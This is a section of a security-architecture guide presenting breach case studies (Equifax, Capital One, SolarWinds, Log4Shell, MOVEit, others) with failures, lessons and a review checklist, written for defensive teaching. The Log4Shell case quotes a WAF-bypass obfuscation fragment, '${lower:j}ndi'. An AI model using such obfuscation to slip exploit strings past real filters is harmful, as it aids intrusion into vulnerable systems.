Section 10

Real-World Case Studies

Learning from real-world security successes and failures provides invaluable lessons for architects. These case studies illustrate key principles in action.

Case Study 1: The Equifax Breach (2017)

What Happened

147 million records exposed due to an unpatched Apache Struts vulnerability (CVE-2017-5638). Attackers had access for 76 days before detection.

Architecture Failures

• Unpatched internet-facing server
• Expired SSL certificate on monitoring tool
• Flat network allowed lateral movement
• Sensitive data not encrypted at rest
• Poor network segmentation

Lessons Learned

• Automated patch management is critical
• Network segmentation limits blast radius
• Encrypt sensitive data at rest
• Monitor SSL certificate expiration
• Defense in depth matters

Case Study 2: Capital One Breach (2019)

What Happened

106 million records exposed via SSRF attack against misconfigured AWS WAF. Attacker exploited overly permissive IAM role to access S3 buckets.

Architecture Failures

• WAF role had excessive S3 permissions
• SSRF not blocked by WAF
• IMDSv1 allowed credential theft
• No detection of unusual API calls
• Sensitive data in S3 not adequately protected

Lessons Learned

• Apply least privilege to all IAM roles
• Use IMDSv2 to prevent SSRF credential theft
• Monitor CloudTrail for anomalous API activity
• Regular IAM permission audits
• Cloud-native security tools matter

Case Study 3: SolarWinds Supply Chain Attack (2020)

What Happened

Nation-state attackers compromised SolarWinds' build system, injecting malware into Orion software updates. 18,000+ organizations installed the backdoor.

Architecture Failures

• Build server compromise went undetected
• Code signing didn't prevent injection
• Trusted software had excessive network access
• Minimal monitoring of outbound traffic
• Domain fronting evaded detection

Lessons Learned

• Secure the software supply chain
• Reproducible builds for verification
• Monitor build system integrity
• Zero Trust for internal software too
• Limit network access of monitoring tools

Case Study 4: Log4Shell (2021)

What Happened

CVE-2021-44228 — a critical RCE in Apache Log4j (CVSS 10.0). JNDI lookups in log messages allowed remote code execution. Affected virtually every Java application.

MITRE ATT&CK: T1190 (Exploit Public-Facing App), T1059.004 (Unix Shell), T1105 (Ingress Tool Transfer)

Architecture Failures

• Logging library had network call capability (violates economy of mechanism)
• No SBOM — orgs didn't know where Log4j was deployed
• Egress filtering not enforced (allowed LDAP/RMI outbound)
• WAFs bypassed with obfuscation (${lower:j}ndi)

Lessons Learned

• Maintain SBOMs for all applications
• Restrict egress traffic by default
• Libraries should follow least privilege
• Defense in depth — patching alone isn't enough

Case Study 5: Okta / Lapsus$ (2022)

What Happened

Lapsus$ compromised a third-party support contractor's laptop, gaining access to Okta's internal admin tools. Up to 366 Okta customers' tenants were potentially affected.

MITRE ATT&CK: T1199 (Trusted Relationship), T1078 (Valid Accounts), T1552 (Unsecured Credentials)

Architecture Failures

• Third-party contractor had admin-level access
• No separation of privilege for support tools
• Delayed incident disclosure (2 months)
• Insufficient access logging on contractor sessions

Lessons Learned

• Apply Zero Trust to third-party access
• Time-boxed, audited contractor sessions
• Separation of duties for admin tools
• Rapid incident communication to customers

Case Study 6: MOVEit Transfer (2023)

What Happened

CVE-2023-34362 — SQL injection zero-day in Progress MOVEit Transfer exploited by Cl0p ransomware gang. 2,500+ organizations affected, 60M+ individuals' data stolen.

MITRE ATT&CK: T1190 (Exploit Public-Facing App), T1505.003 (Web Shell), T1567 (Exfiltration Over Web Service)

Architecture Failures

• SQL injection in 2023 — basic input validation missing
• Web shell deployment not detected
• File transfer app directly on internet without WAF
• Mass data exfiltration went unnoticed

Lessons Learned

• Never expose file transfer tools directly to internet
• WAF + IDS in front of all public-facing apps
• Monitor for web shell indicators
• DLP to detect bulk data exfiltration

Case Study 7: Microsoft Storm-0558 (2023)

What Happened

Chinese threat actor acquired a Microsoft consumer signing key from a crash dump, using it to forge Azure AD tokens and access government email accounts.

MITRE ATT&CK: T1552.004 (Private Keys), T1606.002 (SAML Tokens), T1114.002 (Email Collection)

Architecture Failures

• Signing key in crash dump (dev environment leak)
• Consumer key accepted by enterprise service (validation gap)
• No key rotation forced after potential exposure
• Cloud audit logs not available to affected tenants

Lessons Learned

• Strict key isolation between consumer/enterprise
• Sanitize crash dumps for sensitive material
• Token validation must check issuer scope
• Log access must be available to all customers

Case Study 8: Cloudflare Thanksgiving 2023 (Positive)

What They Did Right

Nation-state attacker (likely related to Okta breach) used stolen OAuth tokens to access Cloudflare's Atlassian server. Due to Zero Trust architecture, the blast radius was minimal despite initial access.

Why the Damage Was Limited

• Zero Trust segmentation — Atlassian couldn't reach production
• Rotation of all 5,000 credentials after Okta incident (proactive)
• Detection within hours via anomalous access patterns
• Transparent public disclosure with full timeline
• "Code Red" remediation — rotated every credential, even those not known compromised

Key Architecture Decisions

• Assume breach mentality operationalized
• Network segmentation prevented lateral movement to production
• Comprehensive logging enabled rapid forensics
• Incident response plan executed within minutes

Case Study 9: Secure Architecture Success - Google BeyondCorp

What They Did Right

After the Aurora attacks, Google rebuilt their security model. BeyondCorp eliminated the corporate network perimeter, implementing Zero Trust before it had a name.

Architecture Decisions

• No trusted network—all access is identity-based
• Device trust established through inventory and health
• Access Proxy mediates all application access
• Context-aware access policies
• Works the same from office, home, or coffee shop

Results

• Eliminated VPN for most use cases
• Consistent security regardless of location
• Reduced attack surface dramatically
• Better user experience than VPN
• Model widely adopted as Zero Trust

Architecture Review Template

Security Architecture Review Checklist

1. Data Security

☐ Data classification completed
☐ Encryption at rest for sensitive data (AES-256)
☐ TLS 1.2+ for all data in transit
☐ Key management strategy defined (KMS/HSM)
☐ Data retention and disposal policy

2. Identity & Access

☐ Authentication mechanism defined (OAuth 2.0/OIDC)
☐ MFA enforced for all human access
☐ Authorization model documented (RBAC/ABAC)
☐ Service-to-service auth specified (mTLS/JWT)
☐ Least privilege applied and verified
☐ Account lifecycle management (JIT, deprovisioning)

3. Network Security

☐ Trust boundaries identified and documented
☐ Network segmentation designed (VPC, subnets)
☐ Ingress/egress controls defined
☐ DDoS mitigation considered
☐ DNS security (DNSSEC, DoH/DoT)

4. Application Security

☐ Input validation at every trust boundary
☐ OWASP Top 10 / API Top 10 mitigations
☐ Secrets management (no hardcoded credentials)
☐ Security headers configured (CSP, HSTS, XFO)
☐ Dependency scanning in CI/CD pipeline

5. Operations & Resilience

☐ Logging and monitoring strategy (SIEM/XDR)
☐ Incident response plan documented and tested
☐ Backup and recovery tested (RTO/RPO defined)
☐ Patch management process with SLAs
☐ Supply chain security (SBOM, vendor review)

Document Your Decisions

Architecture Decision Records (ADRs) capture why security decisions were made. Future teams need to understand the context to avoid undoing security controls. See Reference Architectures for an ADR template.

Framework Alignment

MITRE ATT&CK: Techniques referenced per case study above
NIST CSF 2.0: RS (Respond), RC (Recover) — lessons for incident response
ISO 27002:2022: A.5.24 (Information Security Incident Management), A.5.25 (Assessment of Information Security Events)
Related: Security Frameworks → | Reference Architectures →

← Previous: Secure SDLC Integration Next: Security Frameworks →